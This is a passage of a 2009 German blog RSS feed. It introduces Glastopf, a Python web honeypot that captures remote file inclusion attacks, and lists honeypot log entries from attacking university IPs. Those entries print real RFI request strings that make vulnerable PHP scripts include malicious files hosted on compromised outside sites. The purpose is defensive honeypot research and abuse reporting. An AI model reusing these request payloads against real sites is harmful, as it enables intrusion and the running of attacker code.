    &lt;b&gt;Der &lt;a href=&quot;http://blog.grospolina.net/exit.php?url=aHR0cDovL2dsYXN0b3BmLjFkdXJjaDAuZGU=&amp;amp;entry_id=40&quot;  onmouseover=&quot;window.status=&#039;http://glastopf.1durch0.de&#039;;return true;&quot; onmouseout=&quot;window.status=&#039;&#039;;return true;&quot; title=&quot;Glastopf&quot;&gt;Glastopf&lt;/a&gt; nimmt langsam Gestalt an.&lt;br /&gt;&lt;/b&gt;
&lt;br /&gt;
&lt;u&gt;Was ist der Glastopf?&lt;/u&gt;&lt;br /&gt;
Der Glastopf ist ein in &lt;a href=&quot;http://blog.grospolina.net/exit.php?url=aHR0cDovL3B5dGhvbi5vcmc=&amp;amp;entry_id=40&quot;  onmouseover=&quot;window.status=&#039;http://python.org&#039;;return true;&quot; onmouseout=&quot;window.status=&#039;&#039;;return true;&quot; title=&quot;python&quot;&gt;python&lt;/a&gt; geschriebener Webhoneypot.&lt;br /&gt;
Er baut darauf auf, dass die &lt;i&gt;RFI scanner&lt;/i&gt; google dorks benutzen.&lt;br /&gt;
Anfragen an den Glastopf werden in einer Mysql-Datenbank abgelegt,&lt;br /&gt;
erfolgreich heruntergeladene Skripte werden mit dem Dateinamen der MD5-Summe auf der Festplatte gespeichert.&lt;br /&gt;
Die Rückgabe an den Angreifer wird über ein leicht zu erweiterndes &lt;i&gt;parseline&lt;/i&gt; Modul erreicht.&lt;br /&gt;
Sofern die Rückgabe auf Gefallen stösst, erhalten wir auch die nachgeladenen Skripte.&lt;br /&gt;
Ein einfach zu bearbeitendes &lt;a href=&quot;http://blog.grospolina.net/exit.php?url=aHR0cDovL3RyYWMuMWR1cmNoMC5kZS90cmFjLw==&amp;amp;entry_id=40&quot;  onmouseover=&quot;window.status=&#039;http://trac.1durch0.de/trac/&#039;;return true;&quot; onmouseout=&quot;window.status=&#039;&#039;;return true;&quot; title=&quot;web interface&quot;&gt;Webinterface&lt;/a&gt; ist eine weitere Komponente.&lt;br /&gt;
Selbstverständlich ist der &lt;i&gt;Glastopf&lt;/i&gt; als experimentelle Software zu sehen.&lt;br /&gt;
&lt;br /&gt;
&lt;u&gt;Wo kann man den &lt;i&gt;glastopf&lt;/i&gt; herunterladen?&lt;/u&gt;&lt;br /&gt;
Für das Glastopf-Projekt gibt es eine subversion-Verwaltung.&lt;br /&gt;
Zudem stehen tarballs zur Verfügung.&lt;br /&gt;
In den svn branches findet Ihr zusätzlich eine funktionsreichere Version des Webinterfaces als auch einen unstable und testing-Zweig des Honigtopfes.&lt;br /&gt;
Bitte besucht &lt;a href=&quot;http://blog.grospolina.net/exit.php?url=aHR0cDovL3RyYWMuMWR1cmNoMC5kZS90cmFjL3dpa2kvR2xhc3RvcGZEb2N1bWVudGF0aW9u&amp;amp;entry_id=40&quot;  onmouseover=&quot;window.status=&#039;http://trac.1durch0.de/trac/wiki/GlastopfDocumentation&#039;;return true;&quot; onmouseout=&quot;window.status=&#039;&#039;;return true;&quot; title=&quot;Dokumentation&quot; target=&quot;_blank&quot;&gt;http://trac.1durch0.de/trac/wiki/GlastopfDocumentation&lt;/a&gt;. &lt;br /&gt;Dort findet Ihr auch kurze Anleitungen zur Installation auf debian, winXP und OS-X.&lt;br /&gt;
&lt;br /&gt;
&lt;u&gt;Ein kurzer Blick auf das Webinterface&lt;/u&gt;&lt;br /&gt;
Ich habe ein paar screenshots von der bei mir laufenden Version des Webinterfaces (branches/wi-unstable) gemacht. &lt;br /&gt;
Die Namen der angegriffenen Hosts habe ich mit dem Eimer schwarzer Farbe gefüllt.&lt;br /&gt;
So lässt sich noch erkennen, welche Einträge gleich sind.&lt;br /&gt;
Die Hauptseite:&lt;br /&gt;&lt;br /&gt;
&lt;a class=&#039;serendipity_image_link&#039; href=&#039;http://blog.grospolina.net/uploads/images/glastopf_wi_log.jpg&#039; target=&quot;_blank&quot;&gt;&lt;!-- s9ymdb:25 --&gt;&lt;img width=&quot;90&quot; height=&quot;72&quot; style=&quot;border: 0px; padding-left: 5px; padding-right: 5px;&quot; src=&quot;http://blog.grospolina.net/uploads/images/glastopf_wi_log.serendipityThumb.jpg&quot; alt=&quot;&quot;  /&gt;&lt;/a&gt;
&lt;br /&gt;&lt;i&gt;Klicken zum Vergrössern!&lt;/i&gt;&lt;br /&gt;&lt;br /&gt;
Die ID, das auto_increment der Datenbank, ist verlinkt mit einem Report:&lt;br /&gt;&lt;br /&gt;
&lt;a class=&#039;serendipity_image_link&#039; href=&#039;http://blog.grospolina.net/uploads/images/glastopf_wi_report.jpg&#039; target=&quot;_blank&quot;&gt;&lt;!-- s9ymdb:26 --&gt;&lt;img width=&quot;90&quot; height=&quot;63&quot; style=&quot;border: 0px; padding-left: 5px; padding-right: 5px;&quot; src=&quot;http://blog.grospolina.net/uploads/images/glastopf_wi_report.serendipityThumb.jpg&quot; alt=&quot;&quot;  /&gt;&lt;/a&gt;&lt;br /&gt;&lt;i&gt;Klicken zum Vergrössern!&lt;/i&gt;&lt;br /&gt;&lt;br /&gt;
Über eine Klick auf die IP gelangen wir zur whois page:&lt;br /&gt;
&lt;a class=&#039;serendipity_image_link&#039; href=&#039;http://blog.grospolina.net/uploads/images/glastopf_wi_whois.jpg&#039; target=&quot;_blank&quot;&gt;&lt;!-- s9ymdb:27 --&gt;&lt;img width=&quot;90&quot; height=&quot;63&quot; style=&quot;border: 0px; padding-left: 5px; padding-right: 5px;&quot; src=&quot;http://blog.grospolina.net/uploads/images/glastopf_wi_whois.serendipityThumb.jpg&quot; alt=&quot;&quot;  /&gt;&lt;/a&gt;&lt;br /&gt;&lt;i&gt;Klicken zum Vergrössern&lt;/i&gt;&lt;br /&gt;&lt;br /&gt;
Über den link &quot;search for attacks from IP&quot; erreichen wir die Suchseite:&lt;br /&gt;
&lt;a class=&#039;serendipity_image_link&#039; href=&#039;http://blog.grospolina.net/uploads/images/glastopf_wi_search.jpg&#039;&gt;&lt;!-- s9ymdb:28 --&gt;&lt;img width=&quot;90&quot; height=&quot;65&quot; style=&quot;border: 0px; padding-left: 5px; padding-right: 5px;&quot; src=&quot;http://blog.grospolina.net/uploads/images/glastopf_wi_search.serendipityThumb.jpg&quot; alt=&quot;&quot;  /&gt;&lt;/a&gt;&lt;br /&gt;
&lt;i&gt;Klicken zum Vergrössern&lt;/i&gt;&lt;br /&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;u&gt;Wie alles begann&lt;/u&gt;&lt;br /&gt;
Irgendwann hatte ich &lt;a href=&quot;http://blog.grospolina.net/exit.php?url=aHR0cDovL2dsYXNibG9nLjFkdXJjaDAuZGUvP3A9MjIzIHRhcmdldD1fYmxhbms=&amp;amp;entry_id=40&quot;  onmouseover=&quot;window.status=&#039;http://glasblog.1durch0.de/?p=223 target=_blank&#039;;return true;&quot; onmouseout=&quot;window.status=&#039;&#039;;return true;&quot; title=&quot;glaslos&quot;&gt;glaslos&lt;/a&gt; von meinem honeyd script erzählt,&lt;br /&gt;
welches eine minimale Interaktivität mitbringt, die reicht, um bei RFI Attacken das Nachladen des &lt;i&gt;spreaders&lt;/i&gt; oder einer &lt;i&gt;shell&lt;/i&gt; zu provozieren.&lt;br /&gt;
Ein paar Tage später fragte er mich, ob ich ihm dieses script mal schicken könnte.&lt;br /&gt;
Wiederum ein paar Tage später präsentierte er mir zu meiner Überraschung die erste Version, eine Migration geschrieben in &lt;a href=&quot;http://blog.grospolina.net/exit.php?url=aHR0cDovL3B5dGhvbi5vcmc=&amp;amp;entry_id=40&quot;  onmouseover=&quot;window.status=&#039;http://python.org&#039;;return true;&quot; onmouseout=&quot;window.status=&#039;&#039;;return true;&quot; title=&quot;python&quot;&gt;python&lt;/a&gt;.&lt;br /&gt;&lt;br /&gt;
&lt;u&gt;Ein paar Zahlen&lt;/u&gt;&lt;br /&gt;
Meine trunk version rennt nun seit dem 4.11.2008 und hat seit diesem Tag 651897 &lt;i&gt;unique hits&lt;/i&gt; zu verzeichnen.&lt;br /&gt;
Diese Angriffe führten zu 14.949 Dateien.&lt;br /&gt;
Zusätzlich betreibe ich noch einen zweiten Glastopf, der die aktuelle &lt;i&gt;Unstable&lt;/i&gt; nutzt.&lt;br /&gt;
&lt;br /&gt;
&lt;u&gt;Was geplant ist&lt;/u&gt;&lt;br /&gt;
In der Planung ist eine zentrale Datenbank, in die Nutzer des Glastopfes schreiben und anderer Einträge lesen können.&lt;br /&gt;
Die Form steht noch zur Debatte.&lt;br /&gt;
Das Update der index-Datei über eine Datenbank, gebunden an &lt;i&gt;milw0rm&lt;/i&gt; und ähnliches.&lt;br /&gt;
Die Ausweitung auf SQLinjection Angriffe, &lt;br /&gt;
und erweiterte Unterstützung für LFI.&lt;br /&gt;
Für das Webinterface wären ein paar Statistiken und bunte Kuchen auch ganz schön anzusehn.&lt;br /&gt;
&lt;br /&gt;
&lt;u&gt;Wer mithelfen kann&lt;/u&gt;&lt;br /&gt;
Mithelfen kann eigentlich jeder, der sich für diese Themen interessiert.&lt;br /&gt;
Feedback ist immer erwünscht. &lt;br /&gt;
Jeder, der den Glastopf probiert, sollte Rückmeldung geben.&lt;br /&gt;
Es steht jedem offen, ein Ticket im &lt;a href=&quot;http://blog.grospolina.net/exit.php?url=aHR0cDovL3RyYWMuMWR1cmNoMC5kZS90cmFj&amp;amp;entry_id=40&quot;  onmouseover=&quot;window.status=&#039;http://trac.1durch0.de/trac&#039;;return true;&quot; onmouseout=&quot;window.status=&#039;&#039;;return true;&quot; title=&quot;Glastopf Trac&quot;&gt;Trac&lt;/a&gt; zu erstellen.&lt;br /&gt;
Ansonsten:&lt;br /&gt;
Ich persönlich fänd es fein, wenn jemand sich mit den Statistiken beschäftigen würde,&lt;br /&gt;
während glaslos wohl eher die malware-db will. :)&lt;br /&gt;
&lt;br /&gt;
&lt;u&gt;Ein kleines Danke an alle!&lt;/u&gt;&lt;br /&gt;
Danke erstmal an alle, die mich ertragen.&lt;br /&gt;
Speziell an Lukas, dass er dieses Projekt aus dem Boden gestampft hat,&lt;br /&gt;
ich persönlich halte es für einen Meilenstein.&lt;br /&gt;
Danke auch an die Leute, die mit weiteren Skripten und Ideen, uns unterstützen.&lt;br /&gt;
Wohlwollend möchte ich noch nirgil vom tschechischen honeynet Projekt danken&lt;br /&gt;
für das entgegengebrachte Vertrauen und datentechnische Ünterstützung.&lt;br /&gt;
&lt;br /&gt;
bis dahin,&lt;br /&gt;
kat
 
    </content:encoded>

    <pubDate>Fri, 27 Mar 2009 13:23:04 +0100</pubDate>
    <guid isPermaLink="false">http://blog.grospolina.net/archives/40-guid.html</guid>
    
</item>
<item>
    <title>[glastopf] uni-bs.de &amp; 134.*</title>
    <link>http://blog.grospolina.net/archives/37-glastopf-uni-bs.de-134..html</link>
            <category>glastopf</category>
            <category>honeypot</category>
            <category>malware</category>
    
    <comments>http://blog.grospolina.net/archives/37-glastopf-uni-bs.de-134..html#comments</comments>
    <wfw:comment>http://blog.grospolina.net/wfwcomment.php?cid=37</wfw:comment>

    <slash:comments>0</slash:comments>
    <wfw:commentRss>http://blog.grospolina.net/rss.php?version=2.0&amp;type=comments&amp;cid=37</wfw:commentRss>
    

    <author>nospam@example.com (katsumi)</author>
    <content:encoded>
    Ich teste grade ein paar Suchen für das WI vom glastopf...&lt;br /&gt;
Gerade fertig geworden ist die Suche nach IPs.&lt;br /&gt;
Dort habe ich mal &quot;134* &quot; eingegeben...&lt;br /&gt;
..und auf Grund andauernder Ignoranz, werde ich ab und zu mal was veröffentlichen.&lt;br /&gt;
Die Technische Universität Braunschweig mit ihrer Präsenz als &quot;tu-bs.de&quot;&lt;br /&gt;
erwies sich als abuse-mail resistent.&lt;br /&gt;
...öhm..neee... da ist ja gar keine addy angegeben wo man sein abuse kram hinschicken kann..??&lt;br /&gt;
&lt;i&gt;Dolce Far Niente&lt;/i&gt;&lt;b&gt; :p&lt;/b&gt;&lt;br /&gt;&lt;br /&gt;


&lt;PRE&gt;
IP  	134.169.6.100
Domain 	rzv100.rz.tu-bs.de
Time 	2009-03-03 11:57:27
Request 	/order/login.php?svr_rootscript=http://www.culturaemacao.art.br/web/alb??
File 	da1e4c6b6f575e70c6a0a00a839a9c74
Count 	5
Compromised 	culturaemacao.art.br
Attacks from IP 	3

IP  	134.169.6.60
Domain 	rzv060.rz.tu-bs.de
Time 	2009-02-24 11:08:41
Request 	//poll/png.php?include_path=http://geocities.com/mala23173/bajo-spread.txt??
File 	e7351a69f86ec138ef3e018891f6ce4a
Count 	2
Compromised 	geocities.com
Attacks from IP 	47

IP  	134.106.40.151
Domain 	websrv01.uni-oldenburg.de
Time 	2009-02-23 01:47:08
Request //administrator/components/com_jcs/jcs.function.php?mosConfig_absolute_path=http://www.kbmaeil.com/kboard/test.txt??
File 	4e3f79cee97fc7404bc0b65abb77f80d
Count 	1
Compromised 	kbmaeil.com
Attacks from IP  	7

IP  	134.173.238.144
Domain 	134.173.238.144
Time 	2009-03-03 08:46:54
Request /index.php?redir=http://mebelbox.home.pl/flash/elite/safe1.txt???
File 	6f223436a4a4ea9b64474a04afa9a9b2
Count 	3
Compromised 	mebelbox.home.pl
Attacks from IP 	94
&lt;PRE&gt;
 
    </content:encoded>

    <pubDate>Fri, 06 Mar 2009 03:56:04 +0100</pubDate>
    <guid isPermaLink="false">http://blog.grospolina.net/archives/37-guid.html</guid>
    
</item>

</channel>
</rss>